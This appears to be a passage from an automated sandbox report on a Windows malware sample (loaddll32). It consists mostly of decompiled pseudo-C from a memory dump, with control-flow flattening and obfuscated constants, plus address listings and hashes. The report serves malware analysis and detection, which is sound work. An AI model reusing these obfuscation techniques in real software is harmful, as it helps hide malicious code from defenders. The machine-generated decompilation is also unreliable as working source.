								_t319 =  &(_t319[0xb]);
								_t315 = 0x5b11858;
								goto L12;
							} else {
								if(_t315 == 0x5b11858) {
									E00882B09(_v188, _t314, _v196, _v204);
								} else {
									if(_t315 == 0xa9c05ca) {
										_t314 = E00880A64( *((intOrPtr*)(_t276 + 4)),  *_t276, _v152, _v208);
										__eflags = _t314;
										if(__eflags != 0) {
											_t315 = 0xed0de4e;
											L12:
											_t276 = _v172;
											goto L1;
										}
									} else {
										if(_t315 == 0xb85ea37) {
											_t315 = 0x26b32e;
											continue;
										} else {
											if(_t315 != 0xed0de4e) {
												goto L15;
											} else {
												_t318 = 0x4000;
												_push(_t276);
												_push(_t276);
												_t274 = E0086C5D8(0x4000);
												_t276 = _v172;
												_t275 = _t274;
												_t319 =  &(_t319[3]);
												_t254 = 0x58c5d57;
												_t315 =  !=  ? 0x58c5d57 : 0x5b11858;
												continue;
											}
										}
									}
								}
							}
							L18:
							return _t275;
						}
						_push(_t276);
						_push(_t276);
						_t318 = E0087CCA0(1, 0x10);
						_push( &_v128);
						_push(_t318);
						_push(_v132);
						_t301 = 0xb;
						E0086E404(_v144, _t301);
						_t276 = _v172;
						_t319 =  &(_t319[7]);
						_t315 = 0xa9c05ca;
						_t254 = 0x58c5d57;
						L15:
						__eflags = _t315 - 0x7f64d40;
					} while (__eflags != 0);
					goto L18;
				}
			}

0x008680c0
0x008680c0
0x008680c6
0x008680d9
0x008680dd
0x008680e2
0x008680ea
0x008680f2
0x008680fa
0x00868102
0x0086810a
0x00868119
0x0086811c
0x00868120
0x00868124
0x0086812c
0x00868134
0x0086813c
0x00868141
0x00868149
0x00868151
0x00868156
0x0086815e
0x00868166
0x0086816e
0x00868176
0x0086817e
0x0086818e
0x00868192
0x0086819a
0x008681a6
0x008681ab
0x008681b1
0x008681bd
0x008681c2
0x008681c8
0x008681d0
0x008681dc
0x008681df
0x008681e3
0x008681e8
0x008681f0
0x008681f8
0x00868200
0x0086820a
0x0086820e
0x00868213
0x0086821b
0x00868223
0x00868228
0x00868230
0x00868238
0x00868240
0x0086824a
0x0086824e
0x00868256
0x0086825e
0x00868266
0x0086826e
0x00868276
0x00868280
0x00868288
0x0086828d
0x00868295
0x0086829d
0x008682a5
0x008682ad
0x008682b5
0x008682bd
0x008682c5
0x008682cd
0x008682d5
0x008682dd
0x008682ec
0x008682ef
0x008682f3
0x008682f7
0x008682fc
0x00868304
0x0086830c
0x00868319
0x0086831d
0x00868321
0x00868329
0x00868331
0x00868339
0x00868341
0x00868346
0x0086834e
0x00868356
0x0086835e
0x00868362
0x0086836a
0x00868372
0x0086837a
0x0086837f
0x0086838c
0x0086838f
0x00868393
0x0086839b
0x008683a3
0x008683b0
0x008683b8
0x008683bb
0x008683bf
0x008683c3
0x008683cb
0x008683d3
0x008683e0
0x008683e4
0x008683e9
0x008683f1
0x008683f1
0x008683f1
0x008683f6
0x008683f6
0x00868404
0x0086849c
0x008684a5
0x008684a9
0x008684b1
0x008684c4
0x008684c5
0x008684c6
0x008684c7
0x008684c8
0x008684d1
0x008684e5
0x008684ea
0x008684ed
0x00000000
0x0086840a
0x00868410
0x0086855a
0x00868416
0x0086841c
0x00868482
0x00868486
0x00868488
0x0086848e
0x00868493
0x00868493
0x00000000
0x00868493
0x0086841e
0x00868424
0x00868469
0x00000000
0x00868426
0x0086842c
0x00000000
0x00868432
0x00868436
0x00868447
0x00868448
0x0086844a
0x0086844f
0x00868453
0x00868455
0x0086845f
0x00868464
0x00000000
0x00868464
0x0086842c
0x00868424
0x0086841c
0x00868410
0x00868564
0x0086856d
0x0086856d
0x00868504
0x00868505
0x0086850f
0x00868518
0x00868519
0x0086851a
0x00868527
0x00868528
0x0086852d
0x00868531
0x00868534
0x00868539
0x0086853e
0x0086853e
0x0086853e
0x00000000
0x0086854a

Strings

K:, xrefs: 00868134
{lN, xrefs: 00868304
#', xrefs: 00868192
"M|X, xrefs: 0086828D

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: "M|X$#'$K:${lN
API String ID: 0-1886388755
Opcode ID: 3f858ae0e932c4d53b75b5429d8afe9a5006b5596ce5449dbd55453c657ea604
Instruction ID: f96663ec1270ffbd9836b1166a93fe5259960273ed08ec2e054d0b3ae6f2d67e
Opcode Fuzzy Hash: 3f858ae0e932c4d53b75b5429d8afe9a5006b5596ce5449dbd55453c657ea604
Instruction Fuzzy Hash: 06C130725083809FC358DF2AC58A90BFBE1FBD4758F108A1DFA9996260D7B1D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00864BFC, Relevance: 5.2, Strings: 4, Instructions: 245
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00864BFC(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				unsigned int _v108;
				unsigned int _v112;
				intOrPtr* _t246;
				signed int _t258;
				intOrPtr _t259;
				intOrPtr _t260;
				signed int _t262;
				intOrPtr _t266;
				intOrPtr _t267;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				intOrPtr _t297;
				void* _t299;
				signed int _t300;
				intOrPtr _t301;
				intOrPtr _t302;
				unsigned int* _t303;
				unsigned int* _t304;

				_t260 = __ecx;
				_t303 =  &_v112;
				_v8 = __edx;
				_v24 = __ecx;
				_v28 = 0xe57752;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x00000395;
				_v84 = 0xa7b43c;
				_v84 = _v84 << 0xc;
				_t299 = 0x791519f;
				_v20 = _v20 & 0x00000000;
				_t291 = 0x69;
				_v84 = _v84 / _t291;
				_v84 = _v84 ^ 0x0126ef50;
				_v64 = 0x5471f4;
				_v64 = _v64 << 0xf;
				_v64 = _v64 ^ 0x38ff966c;
				_v108 = 0xe1a857;
				_v108 = _v108 >> 7;
				_v108 = _v108 << 0xf;
				_v108 = _v108 >> 0xf;
				_v108 = _v108 ^ 0x000c4d53;
				_v112 = 0xe3e3b6;
				_t292 = 0x1c;
				_t258 = 0x3d;
				_v112 = _v112 * 0x7f;
				_v112 = _v112 ^ 0x4177f445;
				_v112 = _v112 >> 8;
				_v112 = _v112 ^ 0x003f3c7e;
				_v60 = 0xdb6601;
				_v60 = _v60 | 0x1a9202c7;
				_v60 = _v60 ^ 0x1ad2035c;
				_v104 = 0x132994;
				_v104 = _v104 / _t292;
				_v104 = _v104 + 0x3dcb;
				_v104 = _v104 | 0x8aefcc47;
				_v104 = _v104 ^ 0x8ae713b1;
				_v80 = 0x4c94ef;
				_v80 = _v80 / _t258;
				_v80 = _v80 + 0xffffb573;
				_v80 = _v80 ^ 0x000791ec;
				_v48 = 0x6ce617;
				_v48 = _v48 ^ 0x91a29be4;
				_v48 = _v48 ^ 0x91c139dc;
				_v52 = 0x59f0b3;
				_v52 = _v52 ^ 0x18747c17;
				_v52 = _v52 ^ 0x182d8be2;
				_v56 = 0x3df981;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x3dfc4daf;
				_v76 = 0x62b80;
				_t293 = 0x5d;
				_v76 = _v76 / _t293;
				_v76 = _v76 + 0xffffe926;
				_v76 = _v76 ^ 0xfff7137f;
				_v72 = 0x7226d;
				_v72 = _v72 >> 1;
				_v72 = _v72 + 0x788a;
				_v72 = _v72 ^ 0x000e590c;
				_v96 = 0x39de81;
				_v96 = _v96 + 0x1ccc;
				_v96 = _v96 ^ 0xfb454dc1;
				_v96 = _v96 ^ 0xf28cd76a;
				_v96 = _v96 ^ 0x09fed289;
				_v100 = 0xca2105;
				_v100 = _v100 | 0x676862be;
				_v100 = _v100 + 0xffff68c4;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0xfa784873;
				_v40 = 0xc4a147;
				_v40 = _v40 ^ 0x45259758;
				_v40 = _v40 ^ 0x45e701de;
				_v44 = 0x2d23a0;
				_t294 = 0x11;
				_t302 = _v8;
				_v44 = _v44 * 0x52;
				_v44 = _v44 ^ 0x0e7a51ec;
				_v92 = 0x79a225;
				_v92 = _v92 / _t294;
				_v92 = _v92 >> 9;
				_v92 = _v92 | 0x8583c695;
				_v92 = _v92 ^ 0x858adeed;
				_v88 = 0xed07fb;
				_v88 = _v88 + 0x2638;
				_t295 = 0x61;
				_v88 = _v88 / _t295;
				_t296 = 0xa;
				_t297 = _v4;
				_v88 = _v88 / _t296;
				_v88 = _v88 ^ 0x000a4d02;
				_v32 = 0x581804;
				_v32 = _v32 << 2;
				_v32 = _v32 ^ 0x01684d46;
				_v68 = 0xe8e83;
				_v68 = _v68 | 0xc7c33aae;
				_t259 = _v8;
				_v68 = _v68 / _t258;
				_v68 = _v68 ^ 0x0347a863;
				_t240 = _v36;
				L1:
				while(1) {
					do {
						while(_t299 != 0x16cba6e) {
							if(_t299 == 0x286464d) {
								_t297 = 0x10000;
								_push(_t260);
								_push(_t260);
								_t240 = E0086C5D8(0x10000);
								_t259 = _t240;
								_t303 =  &(_t303[3]);
								if(_t259 != 0) {
									_v36 = _t240;
									_t302 = 0x10000;
									L7:
									_t260 = _v24;
									_t299 = 0x16cba6e;
									continue;
								}
							} else {
								if(_t299 != 0x791519f) {
									goto L15;
								} else {
									_t299 = 0x286464d;
									continue;
								}
							}
							goto L16;
						}
						_t262 = E00879C65(_v60,  &_v16, _t240, _t260, _t302, _v104, _v80);
						_t303 =  &(_t303[5]);
						_v20 = _t262;
						if(_t262 == 0) {
							L14:
							_t260 = _v24;
							_t299 = 0xcecd29d;
							goto L15;
						} else {
							_t266 = _v16;
							if(_t266 == 0) {
								goto L14;
							} else {
								_t240 = _v36 + _t266;
								_v36 = _v36 + _t266;
								_t302 = _t302 - _t266;
								if(_t302 != 0) {
									goto L7;
								} else {
									_t267 = _t297 + _t297;
									_push(_t267);
									_push(_t267);
									_v12 = _t267;
									_t301 = E0086C5D8(_t267);
									_t304 =  &(_t303[3]);
									if(_t301 != 0) {
										E0087C9B0(_v72, _t301, _v96, _t297, _t259, _v100);
										E00882B09(_v40, _t259, _v44, _v92);
										_t302 = _t297;
										_t240 = _t301 + _t297;
										_t297 = _v12;
										_t303 =  &(_t304[6]);
										_v36 = _t240;
										_t259 = _t301;
										if(_t302 != 0) {
											goto L7;
										}
									}
								}
							}
						}
						break;
						L15:
						_t240 = _v36;
					} while (_t299 != 0xcecd29d);
					L16:
					_t300 = _v20;
					if(_t300 != 0) {
						_t246 = _v8;
						 *_t246 = _t259;
						 *((intOrPtr*)(_t246 + 4)) = _t297 - _t302;
					} else {
						E00882B09(_v88, _t259, _v32, _v68);
					}
					return _t300;
				}
			}

0x00864bfc
0x00864bfc
0x00864c03
0x00864c07
0x00864c0b
0x00864c13
0x00864c18
0x00864c20
0x00864c28
0x00864c31
0x00864c3a
0x00864c3f
0x00864c44
0x00864c4a
0x00864c52
0x00864c5a
0x00864c5f
0x00864c67
0x00864c6f
0x00864c74
0x00864c79
0x00864c7e
0x00864c86
0x00864c93
0x00864c96
0x00864c99
0x00864c9d
0x00864ca5
0x00864caa
0x00864cb2
0x00864cba
0x00864cc2
0x00864cca
0x00864cda
0x00864cde
0x00864ce6
0x00864cee
0x00864cf6
0x00864d06
0x00864d0a
0x00864d12
0x00864d1a
0x00864d22
0x00864d2a
0x00864d32
0x00864d3a
0x00864d42
0x00864d4a
0x00864d52
0x00864d57
0x00864d5f
0x00864d6b
0x00864d6e
0x00864d72
0x00864d7a
0x00864d82
0x00864d8a
0x00864d8e
0x00864d96
0x00864d9e
0x00864da6
0x00864dae
0x00864db6
0x00864dc0
0x00864dc8
0x00864dd0
0x00864dd8
0x00864de0
0x00864de5
0x00864ded
0x00864df5
0x00864dfd
0x00864e05
0x00864e14
0x00864e17
0x00864e1b
0x00864e1f
0x00864e27
0x00864e37
0x00864e3b
0x00864e40
0x00864e48
0x00864e50
0x00864e58
0x00864e64
0x00864e69
0x00864e73
0x00864e78
0x00864e7c
0x00864e80
0x00864e88
0x00864e90
0x00864e95
0x00864e9d
0x00864ea5
0x00864eb3
0x00864eb7
0x00864ebb
0x00864ec3
0x00000000
0x00864ec7
0x00864ec7
0x00864ec7
0x00864ed5
0x00864eee
0x00864eff
0x00864f00
0x00864f02
0x00864f07
0x00864f09
0x00864f0e
0x00864f14
0x00864f18
0x00864f1a
0x00864f1a
0x00864f1e
0x00000000
0x00864f1e
0x00864ed7
0x00864edd
0x00000000
0x00864ee3
0x00864ee3
0x00000000
0x00864ee3
0x00864edd
0x00000000
0x00864ed5
0x00864f3d
0x00864f3f
0x00864f42
0x00864f48
0x00864fd5
0x00864fd5
0x00864fd9
0x00000000
0x00864f4e
0x00864f4e
0x00864f54
0x00000000
0x00864f56
0x00864f5a
0x00864f5c
0x00864f60
0x00864f62
0x00000000
0x00864f64
0x00864f68
0x00864f77
0x00864f78
0x00864f7a
0x00864f86
0x00864f88
0x00864f8d
0x00864f9f
0x00864fb2
0x00864fb7
0x00864fb9
0x00864fbc
0x00864fc3
0x00864fc6
0x00864fca
0x00864fce
0x00000000
0x00864fd0
0x00864fce
0x00864f8d
0x00864f62
0x00864f54
0x00000000
0x00864fde
0x00864fde
0x00864fe2
0x00864fee
0x00864fee
0x00864ff4
0x00865011
0x00865017
0x00865019
0x00864ff6
0x00865004
0x0086500e
0x00865025
0x00865025

Strings

Rw, xrefs: 00864C0B
~<?, xrefs: 00864C8E
~<?, xrefs: 00864CAA
8&, xrefs: 00864E58

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 8&$Rw$~<?$~<?
API String ID: 0-2119221410
Opcode ID: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
Instruction ID: 1d414f7ea52a242c8e2534280de55882f4da05f9f00af1f3d0acbc9586dff469
Opcode Fuzzy Hash: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
Instruction Fuzzy Hash: 8DB11B716083419FC358CF6AC48990BFBE1FBC4768F50992DF9A596220C7B5D909CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00882D53, Relevance: 5.2, Strings: 4, Instructions: 221
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00882D53(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				void* _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				void* _t267;
				void* _t268;
				signed int* _t271;
				signed int* _t272;

				_t271 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xb3680a;
				_v8 = 0x44a7b2;
				_v84 = 0x16e473;
				_v84 = _v84 | 0xff7fd6cb;
				_v84 = _v84 << 0xe;
				_v84 = _v84 ^ 0xfdb25567;
				_v88 = 0x1491df;
				_v88 = _v88 | 0x25bec09f;
				_v88 = _v88 + 0xf90e;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xcae39943;
				_v92 = 0xaddb4a;
				_v92 = _v92 ^ 0x38a1add8;
				_t267 = __edx;
				_t243 = __ecx;
				_t245 = 0x27;
				_t268 = 0x72ed85;
				_v92 = _v92 / _t245;
				_t246 = 0x26;
				_v92 = _v92 * 0x56;
				_v92 = _v92 ^ 0x7b991acf;
				_v36 = 0x41254;
				_v36 = _v36 ^ 0x82dbc96b;
				_v36 = _v36 ^ 0x82dd2337;
				_v28 = 0x754151;
				_v28 = _v28 + 0x3d65;
				_v28 = _v28 ^ 0x0076627a;
				_v76 = 0xa9aca8;
				_v76 = _v76 * 0x46;
				_v76 = _v76 << 0x10;
				_v76 = _v76 * 0x71;
				_v76 = _v76 ^ 0xcef7d733;
				_v80 = 0x19ef1d;
				_v80 = _v80 + 0x4807;
				_v80 = _v80 >> 0x10;
				_t247 = 9;
				_v80 = _v80 / _t246;
				_v80 = _v80 ^ 0x000e4732;
				_v32 = 0xb4891b;
				_v32 = _v32 | 0x91ee1565;
				_v32 = _v32 ^ 0x91f206c4;
				_v52 = 0xb65ed8;
				_v52 = _v52 ^ 0x53a92618;
				_v52 = _v52 * 0x77;
				_v52 = _v52 ^ 0xa3a75cc7;
				_v20 = 0xeecfa7;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x3bb2e2c4;
				_v72 = 0xfbd7a5;
				_v72 = _v72 ^ 0x9f68e208;
				_v72 = _v72 << 8;
				_v72 = _v72 | 0x30258995;
				_v72 = _v72 ^ 0xb3385db1;
				_v24 = 0x1aaffc;
				_v24 = _v24 * 0x36;
				_v24 = _v24 ^ 0x05ac1646;
				_v16 = 0xb69c42;
				_v16 = _v16 + 0x3887;
				_v16 = _v16 ^ 0x00b1c7d8;
				_v44 = 0x5789e3;
				_v44 = _v44 / _t247;
				_v44 = _v44 + 0xffffe7e6;
				_v44 = _v44 ^ 0x00087fde;
				_v68 = 0x94873;
				_v68 = _v68 << 0xf;
				_v68 = _v68 + 0xffff48e1;
				_v68 = _v68 ^ 0x69c9ade9;
				_v68 = _v68 ^ 0xcdf62ffc;
				_v48 = 0x208212;
				_v48 = _v48 | 0x39c03c72;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 ^ 0x0008cd3c;
				_v96 = 0x3b2be3;
				_v96 = _v96 ^ 0x07755c49;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x076fdb2f;
				_v96 = _v96 ^ 0x07616547;
				_v100 = 0xac4dde;
				_v100 = _v100 + 0x3900;
				_t248 = 0x42;
				_v100 = _v100 * 0x54;
				_v100 = _v100 ^ 0x672a87d3;
				_v100 = _v100 ^ 0x5fb939da;
				_v104 = 0x9fab94;
				_v104 = _v104 ^ 0x81ae57b6;
				_v104 = _v104 | 0x48b65982;
				_v104 = _v104 * 0x3c;
				_v104 = _v104 ^ 0x471b6d30;
				_v56 = 0x9acae2;
				_v56 = _v56 << 3;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 ^ 0x000181ed;
				_v60 = 0x9f5509;
				_v60 = _v60 / _t248;
				_v60 = _v60 >> 3;
				_v60 = _v60 + 0xfffff221;
				_v60 = _v60 ^ 0x000ffb1e;
				_v40 = 0x6ff3a2;
				_v40 = _v40 << 9;
				_v40 = _v40 + 0x9f22;
				_v40 = _v40 ^ 0xdfef744e;
				_v64 = 0xeafe6e;
				_v64 = _v64 ^ 0x9deccfb6;
				_v64 = _v64 << 0xf;
				_v64 = _v64 * 0x79;
				_v64 = _v64 ^ 0xc780890d;
				while(1) {
					L1:
					_t237 = 0xd8fe181;
					do {
						L2:
						while(_t268 != 0x72ed85) {
							if(_t268 == 0xb6c7232) {
								_t263 = _v44;
								_t248 = _v16;
								_t238 = E00881005(_v16, _v44, _v68, _v48,  *((intOrPtr*)(_t267 + 0x38)));
								_t271 =  &(_t271[3]);
								 *((intOrPtr*)(_t267 + 0x2c)) = _t238;
								__eflags = _t238;
								_t237 = 0xd8fe181;
								_t268 =  !=  ? 0xd8fe181 : 0xd6f812a;
								continue;
							}
							if(_t268 == 0xc5020c9) {
								_push(_v36);
								_t239 = E00883263(_v84, _v88, __eflags, _t243, _v92, _t248);
								_t272 =  &(_t271[4]);
								 *((intOrPtr*)(_t267 + 0x38)) = _t239;
								__eflags = _t239;
								if(_t239 != 0) {
									E0088148A(_t239, _t239, _v28, _v76, _v80, _v32);
									_t263 = _v20;
									_t248 = _v52;
									E0086E2BD(_v20, _v72,  *((intOrPtr*)(_t267 + 0x38)), _v24);
									_t271 =  &(_t272[7]);
									_t268 = 0xb6c7232;
									goto L1;
								}
							} else {
								if(_t268 == 0xd6f812a) {
									return E0086F0E9(_v60,  *((intOrPtr*)(_t267 + 0x38)), _v40, _v64);
								}
								if(_t268 != _t237) {
									goto L13;
								} else {
									_t239 = E00870EBC(_v96, _t263, _v100, _v96, _v104, _v56, _v96, _t248, _t267, E0087A2A5);
									_t271 =  &(_t271[8]);
									 *((intOrPtr*)(_t267 + 0x48)) = _t239;
									if(_t239 == 0) {
										_t268 = 0xd6f812a;
										while(1) {
											L1:
											_t237 = 0xd8fe181;
											goto L2;
										}
									}
								}
							}
							return _t239;
						}
						_t268 = 0xc5020c9;
						L13:
						__eflags = _t268 - 0x11d9bb5;
					} while (__eflags != 0);
					return _t237;
				}
			}

0x00882d53
0x00882d56
0x00882d5b
0x00882d63
0x00882d6b
0x00882d73
0x00882d7b
0x00882d80
0x00882d88
0x00882d90
0x00882d98
0x00882da0
0x00882da5
0x00882dad
0x00882db5
0x00882dc7
0x00882dc9
0x00882dcb
0x00882dce
0x00882dd7
0x00882de2
0x00882de5
0x00882de9
0x00882df1
0x00882df9
0x00882e01
0x00882e09
0x00882e11
0x00882e19
0x00882e21
0x00882e2e
0x00882e32
0x00882e3c
0x00882e40
0x00882e48
0x00882e50
0x00882e58
0x00882e63
0x00882e64
0x00882e68
0x00882e70
0x00882e78
0x00882e80
0x00882e88
0x00882e90
0x00882e9d
0x00882ea1
0x00882ea9
0x00882eb1
0x00882eb6
0x00882ebe
0x00882ec6
0x00882ece
0x00882ed3
0x00882edb
0x00882ee3
0x00882ef0
0x00882ef4
0x00882efc
0x00882f04
0x00882f0c
0x00882f16
0x00882f26
0x00882f2c
0x00882f39
0x00882f41
0x00882f49
0x00882f4e
0x00882f56
0x00882f5e
0x00882f66
0x00882f6e
0x00882f76
0x00882f7b
0x00882f83
0x00882f8b
0x00882f93
0x00882f98
0x00882fa0
0x00882fa8
0x00882fb0
0x00882fbd
0x00882fbe
0x00882fc2
0x00882fca
0x00882fd2
0x00882fda
0x00882fe2
0x00882fef
0x00882ff3
0x00882ffb
0x00883003
0x00883008
0x0088300d
0x00883015
0x00883023
0x00883027
0x0088302c
0x00883034
0x0088303c
0x00883044
0x00883049
0x00883051
0x00883059
0x00883061
0x00883069
0x00883073
0x00883077
0x0088307f
0x0088307f
0x0088307f
0x00883084
0x00000000
0x00883084
0x00883096
0x00883155
0x00883159
0x0088315d
0x00883162
0x00883165
0x00883168
0x0088316c
0x00883171
0x00000000
0x00883171
0x008830a2
0x008830e4
0x008830f6
0x008830fb
0x008830fe
0x00883101
0x00883103
0x0088311d
0x0088312d
0x00883134
0x00883138
0x0088313d
0x00883140
0x00000000
0x00883140
0x008830a4
0x008830a6
0x00000000
0x008831a1
0x008830ae
0x00000000
0x008830b4
0x008830cd
0x008830d2
0x008830d5
0x008830da
0x008830e0
0x0088307f
0x0088307f
0x0088307f
0x00000000
0x0088307f
0x0088307f
0x008830da
0x008830ae
0x008831a9
0x008831a9
0x00883179
0x0088317e
0x0088317e
0x0088317e
0x00000000
0x00883084

Strings

+;, xrefs: 00882F83
zbv, xrefs: 00882E19
sH, xrefs: 00882F41
$P, xrefs: 00882DC3, 008830B9

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$sH$zbv$+;
API String ID: 0-3806253346
Opcode ID: ed91df86ddbcc1a275327a8f189c72815e4a5f3f39146df3325a8f98742b65fc
Instruction ID: 32698a90663b517835392fbaba85dcdd36d7cb630e6a7491f2575e78d0ed1d72
Opcode Fuzzy Hash: ed91df86ddbcc1a275327a8f189c72815e4a5f3f39146df3325a8f98742b65fc
Instruction Fuzzy Hash: ABB10D72408381AFD358DF65C58A81BFBE2FB80758F509A1DF59686260D3B1CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0087E4E5, Relevance: 5.2, Strings: 4, Instructions: 220
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0087E4E5(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				intOrPtr _v80;
				intOrPtr _v92;
				intOrPtr _v124;
				intOrPtr _v140;
				char _v152;
				char _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				unsigned int _v200;
				void* __ecx;
				void* _t118;
				signed int _t141;
				void* _t151;
				intOrPtr _t166;
				intOrPtr _t182;
				signed int _t183;
				intOrPtr _t184;
				signed int* _t187;
				void* _t189;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0087FE29(_t118);
				_v196 = 0x42a34f;
				_t187 =  &(( &_v200)[5]);
				_v196 = _v196 + 0xffffd591;
				_v196 = _v196 >> 8;
				_t182 = 0;
				_v196 = _v196 >> 0xd;
				_t151 = 0x8265549;
				_v196 = _v196 ^ 0x000e54fd;
				_v192 = 0xf4ad66;
				_t183 = 0x28;
				_v192 = _v192 * 0x74;
				_v192 = _v192 + 0xffff9a5e;
				_v192 = _v192 * 0x25;
				_v192 = _v192 ^ 0x06100388;
				_v164 = 0xada112;
				_v164 = _v164 << 6;
				_v164 = _v164 ^ 0x2b616de0;
				_v188 = 0x6e3b94;
				_v188 = _v188 * 0x6f;
				_v188 = _v188 ^ 0xb2fa2ce6;
				_v188 = _v188 >> 2;
				_v188 = _v188 ^ 0x27407061;
				_v184 = 0x76ba26;
				_v184 = _v184 ^ 0xa3b8c1ec;
				_v184 = _v184 * 6;
				_v184 = _v184 ^ 0xd6d91427;
				_v172 = 0x136254;
				_v172 = _v172 + 0x2ded;
				_v172 = _v172 ^ 0x001b6319;
				_v200 = 0xa09af9;
				_v200 = _v200 + 0x31d;
				_v200 = _v200 + 0xffff390b;
				_v200 = _v200 >> 0xc;
				_v200 = _v200 ^ 0x000c9fcd;
				_v176 = 0xee2a82;
				_v176 = _v176 / _t183;
				_v176 = _v176 ^ 0x000a5024;
				_t66 =  &_v176; // 0xa5024
				_t184 =  *_t66;
				_v180 = 0xbc2dba;
				_v180 = _v180 << 0xa;
				_v180 = _v180 << 0xc;
				_v180 = _v180 ^ 0x6e88cd95;
				_v168 = 0x8f86b;
				_v168 = _v168 * 0x73;
				_v168 = _v168 ^ 0x040961a3;
				while(1) {
					_t189 = _t151 - 0x90fe06e;
					if(_t189 > 0) {
						goto L23;
					}
					L2:
					if(_t189 == 0) {
						__eflags = _v140 - 3;
						if(__eflags == 0) {
							E008800EF( &_v152);
							L16:
							_t151 = 0x574a4dd;
							continue;
							do {
								while(1) {
									_t189 = _t151 - 0x90fe06e;
									if(_t189 > 0) {
										goto L23;
									}
									goto L2;
								}
								L45:
								__eflags = _t151 - 0x4105f99;
							} while (__eflags != 0);
							L46:
							return _t182;
						}
						_t151 = 0xaf84b7f;
						while(1) {
							_t189 = _t151 - 0x90fe06e;
							if(_t189 > 0) {
								goto L23;
							}
							goto L2;
						}
						goto L23;
					}
					if(_t151 == 0x172cdb8) {
						_push(_t151);
						_push(_t151);
						_t184 = E0086C5D8(0x5c);
						_t187 =  &(_t187[3]);
						__eflags = _t184;
						if(__eflags == 0) {
							L14:
							_t151 = 0x666f2cd;
							continue;
						}
						 *((intOrPtr*)(_t184 + 0x30)) = _v80;
						 *((intOrPtr*)(_t184 + 8)) = _v124;
						 *((intOrPtr*)(_t184 + 4)) = _v92;
						_t151 = 0xc6d3ff5;
						continue;
					}
					if(_t151 == 0x2270dbc) {
						__eflags = _v140 - 7;
						if(__eflags == 0) {
							E00877D5B( &_v152);
						}
						goto L16;
					}
					if(_t151 == 0x39f0156) {
						__eflags = E00879D3E( &_v60, _v164, __eflags, _v188,  &_v160);
						if(__eflags == 0) {
							goto L46;
						}
						goto L14;
					}
					if(_t151 == 0x574a4dd) {
						_t166 =  *0x886210; // 0x0
						_t182 = _t182 + 1;
						__eflags = _t182;
						 *((intOrPtr*)(_t184 + 0x24)) =  *((intOrPtr*)(_t166 + 0x210));
						 *((intOrPtr*)(_t166 + 0x210)) = _t184;
						L12:
						_t151 = 0x39f0156;
						continue;
					}
					if(_t151 == 0x666f2cd) {
						_t141 = E00878806(_v184, _v172,  &_v160,  &_v152);
						asm("sbb ecx, ecx");
						_t151 = ( ~_t141 & 0xfdd3cc62) + 0x39f0156;
						continue;
					}
					if(_t151 != 0x8265549) {
						goto L45;
					}
					E008622A6(_a4, _v196,  &_v60, _v192);
